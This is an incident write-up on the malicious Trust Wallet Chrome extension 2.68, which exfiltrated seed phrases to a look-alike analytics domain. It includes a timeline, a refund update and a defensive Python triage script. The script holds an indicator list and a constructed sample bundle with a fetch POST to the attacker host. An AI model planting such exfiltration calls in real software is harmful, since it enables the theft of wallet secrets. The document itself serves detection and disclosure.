Trust Wallet’s Chrome Browser Extension Breach Underscores Crypto’s Need for Advanced Security Infrastructure 

A security incident affected Trust Wallet’s Chrome browser extension, specifically version 2.68, leading to approximately $7 million in unauthorized cryptocurrency drains across hundreds of user wallets.

The issue began surfacing on December 25, 2025, shortly after a compromised update was released on December 24. Malicious JavaScript code had been injected into the extension, disguised as analytics functionality built on the posthog-js library.

This code silently exfiltrated users’ mnemonic seed phrases (recovery phrases) when wallets were unlocked or imported, sending them to an attacker-controlled domain (api.metrics-trustwallet[.]com, registered on December 8, 2025).

Attackers then used these phrases to drain funds rapidly, primarily in Bitcoin, Ethereum, and Solana. Investigations suggest a sophisticated supply-chain attack, possibly involving compromised developer access or deployment processes prior to mid-December.

Some analysts, including SlowMist, describe it as potentially APT-level, though the exact method is still under review. Only Chrome browser extension version 2.68 was affected; mobile app users and other browser extension versions were not impacted. No core protocol or blockchain-level vulnerability was involved.

Trust Wallet quickly released a patched version (2.69) on December 25 and urged users to update immediately. Changpeng Zhao (CZ, Binance co-founder and Trust Wallet owner) and the official Trust Wallet team confirmed that all affected users will be fully reimbursed.

Losses are estimated at ~$7 million, and the team is prioritizing refunds via a dedicated support process; users should submit claims through official channels only. As of December 26, Trust Wallet posted: “We’ve confirmed that approximately $7M has been impacted and we will ensure all affected users are refunded.”

If you used the browser extension: do not open version 2.68. Disable it on Chrome’s extensions page. Update to version 2.69 via the official Chrome Web Store listing (Trust Wallet Extension). If affected, submit a claim via Trust Wallet’s official support form as announced on its X account.

Mobile-only users are safe and unaffected. This incident highlights risks with browser-based wallets and automatic updates. For maximum security, consider hardware wallets for significant holdings or sticking to verified mobile apps.

The Trust Wallet incident was a classic supply-chain attack targeting the official Chrome browser extension. On December 24, 2025, version 2.68 was released via the Chrome Web Store containing malicious code that exfiltrated users’ mnemonic seed phrases.

This led to rapid drains across multiple chains (Bitcoin, Ethereum/EVM, Solana), totaling approximately $7 million in losses and affecting hundreds of users. The attack was not due to phishing, user error, or a compromised third-party npm package; instead, the attackers tampered directly with Trust Wallet’s own source code before deployment.

Security firm SlowMist provided the most detailed analysis by comparing versions 2.67 (clean) and 2.68 (compromised). The injected code iterated through all wallets stored in the extension and triggered internal requests to retrieve the encrypted mnemonic phrase for each one.

Using the password the user entered during wallet unlock, it decrypted the phrases locally and sent the plaintext seed phrases to an attacker-controlled server. The code masqueraded as legitimate analytics by piggybacking on posthog-js, the open-source analytics library Trust Wallet genuinely uses.

The attackers redirected the PostHog traffic to their look-alike domain so that it blended in with normal analytics behaviour. The primary malicious logic lived in a bundled JavaScript file often referenced as 4482.js in analyses. Once the attackers held the seed phrases they could import the wallets elsewhere and drain funds immediately; no transaction approvals or user interaction were needed.
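The same version-diff approach can be reproduced as a quick triage script for an unpacked extension build: read the manifest version, pull every literal hostname out of the bundled JavaScript, and flag anything that matches the reported attacker domain, is absent from a clean baseline build, or is not on an allow-list of hosts the extension is expected to contact. The script below is an added example for this write-up, not Trust Wallet’s or SlowMist’s own tooling. The allow-list of legitimate hosts, the sample bundle contents and the manifest fields are assumptions constructed for illustration; the version number and the attacker domain are the ones reported above.

```python
"""Triage an unpacked Trust Wallet extension build for the indicators described above.

Added example for this write-up; not Trust Wallet's or SlowMist's tooling.
Assumptions (not from the article): the allow-list of legitimate hosts, the
constructed sample bundles, and the unpacked layout (manifest.json + *.js).
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional, Set

AFFECTED_VERSIONS = {"2.68"}                                          # reported in the article
IOC_HOSTS = {"api.metrics-trustwallet.com", "metrics-trustwallet.com"}  # reported in the article
# Hosts a clean build is expected to talk to. ASSUMPTION for illustration only:
# a real allow-list must be derived from a verified clean build of the extension.
KNOWN_GOOD_HOSTS = {"us.i.posthog.com", "app.posthog.com"}

# Literal http(s) URLs inside a bundle; the host ends at the first '/' or quote.
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def hosts_in_build(root: Path) -> Set[str]:
    """Return every hostname that appears as a literal URL in the build's JS bundles."""
    found: Set[str] = set()
    for js in root.rglob("*.js"):
        found.update(h.lower() for h in HOST_RE.findall(js.read_text(errors="ignore")))
    return found


def triage(build: Path, baseline: Optional[Path] = None) -> Dict:
    """Check one unpacked build; optionally diff its outbound hosts against a clean build."""
    manifest = json.loads((build / "manifest.json").read_text())
    version = manifest.get("version", "")
    hosts = hosts_in_build(build)
    findings = []
    if version in AFFECTED_VERSIONS:
        findings.append(f"manifest version {version} is a known-compromised release")
    for h in sorted(hosts & IOC_HOSTS):
        findings.append(f"bundle references attacker host {h}")
    for h in sorted(hosts - KNOWN_GOOD_HOSTS - IOC_HOSTS):
        findings.append(f"bundle references host not in allow-list: {h}")
    new_hosts: Set[str] = set()
    if baseline is not None:
        new_hosts = hosts - hosts_in_build(baseline)
        for h in sorted(new_hosts):
            findings.append(f"host absent from baseline build: {h}")
    return {"version": version, "hosts": hosts, "new_hosts": new_hosts, "findings": findings}


# Constructed sample bundles (NOT real extension code): a clean 2.67 bundle that
# reports to the PostHog host, and a 2.68 bundle whose analytics host has been
# swapped for the attacker domain, as the analyses above describe.
CLEAN_BUNDLE = 'posthog.init("phc_example",{api_host:"https://us.i.posthog.com"});'
BAD_BUNDLE = ('posthog.init("phc_example",{api_host:"https://api.metrics-trustwallet.com"});'
              'fetch("https://api.metrics-trustwallet.com/collect",{method:"POST"});')


def write_build(root: Path, version: str, bundle_name: str, bundle_src: str) -> Path:
    """Write a minimal unpacked extension: manifest.json plus one JS bundle."""
    root.mkdir(parents=True, exist_ok=True)
    (root / "manifest.json").write_text(json.dumps({"name": "Trust Wallet", "version": version}))
    (root / bundle_name).write_text(bundle_src)
    return root


def demo():
    """Build the two constructed samples in a temp dir and triage 2.68 against 2.67."""
    tmp = Path(tempfile.mkdtemp())
    clean = write_build(tmp / "2.67", "2.67", "main.js", CLEAN_BUNDLE)
    bad = write_build(tmp / "2.68", "2.68", "4482.js", BAD_BUNDLE)
    return triage(clean), triage(bad, baseline=clean)


if __name__ == "__main__":
    for report in demo():
        print(report["version"], report["findings"] or ["no indicators"])
```

Point the script at the directory Chrome keeps for the installed extension (or at a CRX you have unzipped) and at a copy of the last known-clean release as the baseline. The literal-URL regex is deliberately simple: a bundle that assembles its hostname from fragments at runtime will slip past it, so treat a clean result as a first pass, not proof of integrity, and diff the full bundle text when the version number is already in the affected set.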

December 8, 2025: Domain metrics-trustwallet[.]com registered via the NICENIC INTERNATIONAL registrar.
December 21, 2025: First observed requests to the malicious API.
December 24, 2025: Compromised version 2.68 released.
December 25, 2025: Drains reported en masse; Trust Wallet issues a warning and releases patched version 2.69.

The domain mimicked legitimate Trust Wallet infrastructure and is now offline. Investigations by SlowMist, PeckShield, and on-chain analysts such as ZachXBT point to a likely compromise of developer devices, code repositories, or deployment permissions prior to mid-December.

The attackers showed deep familiarity with Trust Wallet’s codebase. There has been speculation, including from Binance co-founder CZ, about possible insider involvement or a nation-state actor with APT-level sophistication, though there is no conclusive evidence yet. Trust Wallet is still investigating the exact breach vector.

Only Chrome extension version 2.68 was affected; the mobile app and other versions are safe. Trust Wallet patched the issue with version 2.69 on December 25 and committed to full reimbursement of all victims (~$7M in total). Stolen funds were partially laundered via exchanges such as ChangeNOW, FixedFloat, and KuCoin.

This incident underscores the risks of browser extensions with auto-updates and highlights the need for stricter supply-chain security in crypto tools. For high-value holdings, hardware wallets remain the safest option.
